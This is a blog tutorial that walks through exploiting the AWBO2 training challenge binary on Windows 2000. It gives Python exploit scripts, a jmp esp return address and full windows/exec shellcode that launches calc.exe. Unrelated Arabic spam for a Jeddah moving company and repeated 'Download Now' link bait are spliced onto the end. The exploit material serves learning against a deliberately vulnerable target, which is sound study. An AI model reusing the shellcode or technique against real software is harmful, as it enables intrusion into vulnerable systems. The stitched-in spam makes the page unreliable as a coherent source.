In this series of blog posts, I will be documenting my journey into the art of exploitation. My goal for this series is to experiment with some of the challenges that are out there and hopefully provide some guidance for others in my shoes. I am targeting those of you with moderate amount experience in exploitation. Hopefully, I will further my own knowledge and yours (the reader).
What you’ll need:
- Immunity Debugger
- Pvefindaddr plugin
- Windows 2000 SP4 Virtual Machine
In this first post we’re going to look at awbo2.exe. The Advanced Windows Buffer Overflows were written by Lurene Grenier, formerly of Sourcefire’s VRT.
To quote:
At Defcon XIV, Immunity trotted out the first iteration of their NOP cert test, and I had the pleasure of giving it a test run. I still think it’s a great indicator of ability, despite the Immunity tools focus; I’m not a user of any of their tools generally, but I managed to pull off the hardest level test in a modest time. It got us thinking on the way home, where does one go from the bar set by the NOP to get to the next level in terms of exploit development skill? In this vein I’ve thrown together a few windows executables, and in a nod to Gera of Core, they’re called Advanced Windows Buffer Overflows (AWBOs).
To follow along, you can download the binary, as well as the other challenges, from the following URL:
Before we get started, there are a few rules we need to follow:
- All exploits are performed in Windows 2000 SP4 unless otherwise specified. Sometimes, otherwise will be specified.
- Exploits will use the provided shellcode, or ret2lib.
- You may not return to hard coded stack addresses.
- No source code will be provided – just like the NOP cert (one of the most hardcore exploit certs IMO).
You can find the shellcode below:
01 | # windows/exec - 121 bytes |
03 | "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" . |
04 | "\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" . |
05 | "\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" . |
06 | "\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" . |
07 | "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" . |
08 | "\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" . |
09 | "\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" . |
10 | "\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" . |
11 | "\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"; |
Before any engagement like this, the first step is to study the target. As per rule #1, we will be working on Windows 2000 SP4. Run the binary and examine what happens:
The first thing you should notice is that there is an INT3 instruction right at the beginning of the application followed by:
2 | 0040100D 8D85 FCFBFFFF LEA EAX,DWORD PTR SS:[EBP-404] |
3 | 00401013 8945 FC MOV DWORD PTR SS:[EBP-4],EAX] |
4 | 00401016 8D8D FCFBFFFF LEA ECX,DWORD PTR SS:[EBP-404] |
These three instructions are setting up the stack to take in 1028 bytes of input. Go ahead and hit play a couple times to start the application, then send it some junk data.
It looks like we have enough information to go ahead and exploit the application. Lets start things off by writing a simple template (in python) to crash the application. Use Metasploits pattern_create to create a pattern of 1036 bytes in size, this will be for our junk data:
2 | junk = (“metasploit pattern here”) |
8 | print "\n[-] Something went wrong...\n" |
After you’ve saved your exploit. Pipe the data over to awbo2.exe:
So far so good, we’ve crashed the application. But, we didn’t overwrite EIP. Currently, EAX and ECX contain our junk data and we have an access violation at 0×69423169. This access violation is because this isn’t a real address in memory. Instead it is part of our pattern. Using pattern_offset we can find out exactly where to put a real address:
Now restart the application and continue to step through until the call to kernel32 is made. The reason for this is because we need a real address to pass over the first access violation and hopefully lead to the overwrite of EIP. Grab any address here and edit our python script.
04 | addr = "\xda\x48\xe8\x77" # addr from kernel32 |
12 | print "\n[-] Something went wrong...\n" |
Now rerun the python script:
Great! Now that we own EIP, things should be downhill from here. ESP currently points to our junk2 data (“\x42”) and if you look a little closer at the stack. We own nSEH and SEH as well:
Now, we can do one of two things. We can exploit this via an SEH overwrite, or we can keep things simple and just place our shellcode at ESP and jump too it. For now, we’re going to place our shellcode at ESP and jump too it. Open a new instance of Immunity Debugger and search for our jmp esp instruction (make sure to open awbo2.exe and play it before you search):
Now edit our python script with one of the addresses in the j.txt file:
04 | addr = "\xda\x48\xe8\x77" # addr from kernel32 |
08 | EIP = "\x8b\x94\xf8\x77" # jmp esp => ntdll.dll |
10 | shellcode = "\xcc" * 1000 |
13 | print junk + addr + junk2 + EIP + shellcode |
16 | print "\n[-] Something went wrong...\n" |
Run the script, but this time before you step over the break at the beginning. Set a breakpoint at our jmp esp instruction at 0x77f8948b, then hit play:
When you step over this instruction, you should land in our sled of int3 instructions:
Almost there! Edit our script to take our shellcode from before.
04 | addr = "\xda\x48\xe8\x77" # addr from kernel32 |
08 | EIP = "\x8b\x94\xf8\x77" # jmp esp => ntdll.dll |
10 | # windows/exec - 121 bytes |
12 | # EXITFUNC=seh, CMD=calc.exe |
13 | shellcode = ("\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" |
14 | "\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" |
15 | "\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" |
16 | "\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" |
17 | "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" |
18 | "\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" |
19 | "\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" |
20 | "\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" |
21 | "\x63\x61\x6c\x63\x2e\x65\x78\x65\x00") |
24 | print junk + addr + junk2 + EIP + shellcode |
27 | print "\n[-] Something went wrong...\n" |
Run the script, if everything was successful, calc.exe should spawn!
Success! We’ll save SEH for another walkthrough for now.
Coming next is awbo3.exe
Shouts to:
Corelan Team for making some awesome tutorials
Pusscat for making some pretty fun challenges
MC for always answering my questions
J0e for everything he’s done for me
شركة نقل اثاث بجدة متخصصة فى مجال نقل العفش والاثاث بجدة ان نقل الاثاث والعفش من الامور المهمة فى حياتنا لاننا من حين لاخر باحتياج شديد الى شركات نقل العفش بجدة لنقل الاثاث ومشتملاتة من غرف نوم ومطابخ وستائر ومكيفات وغيرها من الشقة القديمة الى الشقة الجديدة لذلك انت بحاجة الى فنيين وسيارات وعمالة مدربة مؤهلة لنقل الاثاث والعفش اتصل بنا متخصصون نقل العفش بجدة مايميزنا غيرنا
تهاود الاسعار للعملاء كافة اسعارنا بمتناول الجميع فنيينا المتميزين فى مجال نقل الاثاث متخصصون فى فك وتركيب جميع انواع غرف النوم الصينى والسحاب والتركى والوطنى والايكيا وغيرها تركيب غرف نوم بكراتينها تركيب جميع انواع الستائر تركيب جميع المطابخ المؤهلة للتركيب يميزنا السيارات المخصصة فى نقل العفش نتميز باننا لدينا مستودعات تخزين
نقوم بترتيب الاثاث بالشقة الجديدة على اكمل وجة عمالتنا المدربة وادارتنا المسئولة وخدمتنا لعمالئنا لدينا قوائم التميز لعملائنا المميزين خصومات للعملاء المستمرين خصومات للهميل الذى ياتى من طرف عميل اخر كل ماعليك هو الاتصال بنا وتجد مايسرك بفضل الله اتصل بنا
https://elasmr16.wordpress.com/2017/10/27/%d8%b4%d8%b1%d9%83%d8%a9-%d9%86%d9%82%d9%84-%d8%b9%d9%81%d8%b4-%d8%a8%d8%ac%d8%af%d8%a9-0544543073/
شركة نقل عفش بجدة
شركة نقل اثاث بجدة
Journey Into Exploitation: Awbo2.Exe >>>>> Download Now
>>>>> Download Full
Journey Into Exploitation: Awbo2.Exe >>>>> Download LINK
>>>>> Download Now
Journey Into Exploitation: Awbo2.Exe >>>>> Download Full
>>>>> Download LINK ne